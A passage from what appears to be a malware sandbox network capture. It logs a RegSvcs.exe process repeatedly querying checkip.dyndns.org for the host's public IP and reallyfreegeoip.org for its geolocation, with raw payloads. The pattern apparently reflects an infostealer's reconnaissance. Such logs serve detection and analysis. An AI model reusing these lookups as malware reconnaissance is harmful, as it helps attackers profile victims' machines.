                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:11:07.314578056 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:07 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.649882193.122.6.168802136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:11:07.938612938 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:11:08.594248056 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:08 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.649890193.122.6.168802136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:11:09.236655951 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:11:09.883912086 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:09 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.649902193.122.6.168802136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 19:11:10.518908024 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 19:11:11.147424936 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:11:11 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.649712104.21.16.14436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:10:46 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:10:46 UTC857INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:46 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847435
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=467XfSZ95bge7lIXK2%2FUY0B5s0iFLx31Kw5aq%2Fj1g75LVl47V%2FQZaVcOUglFfyo9qRDQBSKZHnMFHdiBwNLvQhLh5DILqx%2FVsyxn8roFCiA5uEinunPbXeg1H1BUOP3QluOFzRk4"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0303e057293-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1933&min_rtt=1923&rtt_var=741&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1456359&cwnd=158&unsent_bytes=0&cid=2f49649b26c92966&ts=228&x=0"
                                                                                                                2025-01-10 18:10:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.649718104.21.16.14436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:10:47 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 18:10:47 UTC857INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:47 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847436
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z24IA%2FKrrivBcBEEn3sWlAfXKO0nqgWR3dwF7ggDxdTQWLRv45VLbl5FDwRt4XCl67mmo%2F6YGjzaBsPho1z7%2FP5mmiRLG12lxKRvOanOt%2BjpBiqvQPjoc12ovdg1O56tUvx5Vc8v"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea03659c60fa8-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1492&rtt_var=1481&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=563815&cwnd=252&unsent_bytes=0&cid=862aa72a82860a8d&ts=158&x=0"
                                                                                                                2025-01-10 18:10:47 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.649735104.21.16.14436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:10:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:10:49 UTC861INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:49 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847438
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T5Q1CWvOx1duf5X23HNUGx9j5YXIJJ5a4N%2BZVIGMxcxU%2B1q9GfBq1re%2F6%2BMRN%2BPCfVIfHsdeHwXuSIzz0LuCkEOQiT2Ti9nIFUKaZfVrZvNTw%2BevcwS5vHG5wchGYzo8Jnhkt7ze"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea044cf0e4388-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1633&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1788120&cwnd=221&unsent_bytes=0&cid=001137a0406e377d&ts=142&x=0"
                                                                                                                2025-01-10 18:10:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.649742104.21.16.14436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:10:50 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 18:10:51 UTC861INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:51 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847440
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23ljxE2Gdhs%2BsSPhpPIGWAGoyV0QlYgXym%2F6cPr%2BHto2aw00%2Bdz3kJaDAVEk5CQGKjDITUl3qGhJy7DM58H42xQltJKBkU6%2BVtr7ktzsWQOGviAy9mbiTTgGi%2F0uPxvkWDvRAl0X"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea04ccca28ce3-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1856&min_rtt=1811&rtt_var=711&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1612368&cwnd=252&unsent_bytes=0&cid=b66a75cdb8574de7&ts=165&x=0"
                                                                                                                2025-01-10 18:10:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.649760104.21.16.14436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:10:53 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 18:10:53 UTC861INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:53 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847442
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCHfpLUv78VPInbhL0w4%2B%2Bpkytpdr5D6sVrXOL8CT%2FZK3bBVKr%2B%2BwzIp37z4J2LEVLFYECgoCy7YPoGI8wVMenHqueczN9jI%2FgxBdIdtQ1QtX8tNpmllvHLrHd45LyZDoqGfPd6m"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea05b2d8c1899-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1657&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1718658&cwnd=153&unsent_bytes=0&cid=9767bfbefee8c7fb&ts=164&x=0"
                                                                                                                2025-01-10 18:10:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.649772104.21.16.14436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:10:54 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:10:54 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:54 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847443
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dekc1%2BL3SNSkH4zafrbHtsYmKmoqVj3WvreZX3oefXRL6udyYQJdQFgdg8Rnt%2FsaPaewWGrDYczv2ZzeZroKM%2FCSSNP7lq%2FE19UAo4keKbPS8a6boz%2FbBwqJ6h7qWprSvTTfWY4L"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0646d8441ba-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1650&rtt_var=658&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615044&cwnd=192&unsent_bytes=0&cid=e23b7117795eb82c&ts=163&x=0"
                                                                                                                2025-01-10 18:10:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.649788104.21.16.14436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:10:56 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 18:10:57 UTC857INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:57 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847446
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tGETcIC3t9jGm2qF%2BOGTR6YqlgBILMsRig5yqOSwI6LlXHT6A5TgUbDpF7WagPhCnhL%2BBtfxx6RLb1htb8HPXsSxNCc%2Fs4kxVqQjkmV2hA4Wb1hSnDUEnH5Y5dH3%2BKPYCjLDYtsk"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffea0729d370fa8-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1517&rtt_var=590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1924851&cwnd=252&unsent_bytes=0&cid=5ddc1e78e6ae4f4f&ts=155&x=0"
                                                                                                                2025-01-10 18:10:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.649801104.21.16.14436108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 18:10:58 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 18:10:58 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 18:10:58 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1847447
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
